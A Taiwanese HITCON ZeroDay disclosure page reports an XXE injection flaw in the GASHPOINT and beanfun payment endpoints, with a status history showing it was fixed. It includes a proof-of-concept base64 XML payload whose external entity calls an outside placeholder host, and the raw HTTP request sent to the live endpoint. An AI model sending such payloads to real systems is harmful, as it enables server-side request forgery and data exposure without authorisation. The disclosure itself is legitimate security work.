Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01769
- 發信 Vendor: 樂點股份有限公司 & 遊戲橘子
- Title: GASHPOINT 儲值與 beanfun 平台 存在 XML External Entity 注入問題
- Introduction: XXE
處理狀態
目前狀態
公開
Last Update : 2018/12/31
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2018/12/13 22:55:39 : 新提交 (由 Cyku 更新此狀態)
- 2018/12/14 22:17:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/12/20 17:30:42 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/12/20 17:30:43 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/12/20 17:30:43 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/12/27 14:20:09 : 複測申請中 (由 組織帳號 更新此狀態)
- 2018/12/27 19:22:13 : 確認已修補 (由 Cyku 更新此狀態)
- 2018/12/31 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01769
- 通報者:kanade86514 (Cyku)
- 風險:中
- 類型:XML 外部實體注入 (XML External Entities (XXE))
參考資料
攻擊者可利用此漏洞取得系統敏感資料、攻擊內網甚至取得系統控制權。
OWASP Top 10 - 2017 A4 - XML External Entities (XXE)
https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
XML External Entity (XXE) Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
OWASP Top 10 - 2017 A4 - XML External Entities (XXE)
https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)
XML External Entity (XXE) Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://api.eg.gashplus.com/GPSv2/order.aspx
https://tw.beanfun.com/TW/gash/ReceiveData.aspx
https://tw.beanfun.com/TW/gash/ReceiveData.aspx
敘述
上述功能頁面收到 POST 的 data 參數後進行 base64 decode 得到 XML 資料傳入 XML Parser 解析,
但 Parser 沒有禁止 External Entity 的解析,所以有 XML External Entity (XXE) 注入風險,
透過 XXE 有機會造成 Denial of Service (阻斷服務攻擊) 或 Server-Side Request Forgery (伺服器端請求偽造) 風險,有可能被利用於內網滲透。
(以下 Payload 皆已遮蔽敏感資訊)
測試 data:
PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8IURPQ1RZUEUgVFJBTlMgWwogICAgPCFFTlRJVFkgJSB0ZXN0IFBVQkxJQyAidGVzdCIgImh0dHA6Ly9nYW1hLmUuZXhhbXBsZS5vcmciPgogICAgJXRlc3Q7Cl0+CjxUUkFOUz4KPC9UUkFOUz4=base64 decode:
<?xml version="1.0" ?>
<!DOCTYPE TRANS [
<!ENTITY % test PUBLIC "test" "http://gama.e.example.org">
%test;
]>
<TRANS>
</TRANS>測試的 HTTP Raw Data:
POST /TW/gash/ReceiveData.aspx HTTP/1.1
Host: tw.beanfun.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Cookie: {已遮蔽}
Connection: close
Upgrade-Insecure-Requests: 1
data=PD94bWwgdmVyc2lvbj0iMS4wIiA%2FPgo8IURPQ1RZUEUgVFJBTlMgWwogICAgPCFFTlRJVFkgJSB0ZXN0IFBVQkxJQyAidGVzdCIgImh0dHA6Ly9nYW1hLmUuZXhhbXBsZS5vcmciPgogICAgJXRlc3Q7Cl0%2BCjxUUkFOUz4KPC9UUkFOUz4%3D發送上述 HTTP 請求後可以收到 DNS 查詢請求:
確認 External Entity 成功被解析。
回報時發現 https://api.eg.gashplus.com/GPSv2/order.aspx 好像突然被修復了,同樣 Payload 已無法復現 QQ
修補建議
XXE 修補方式可參考:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。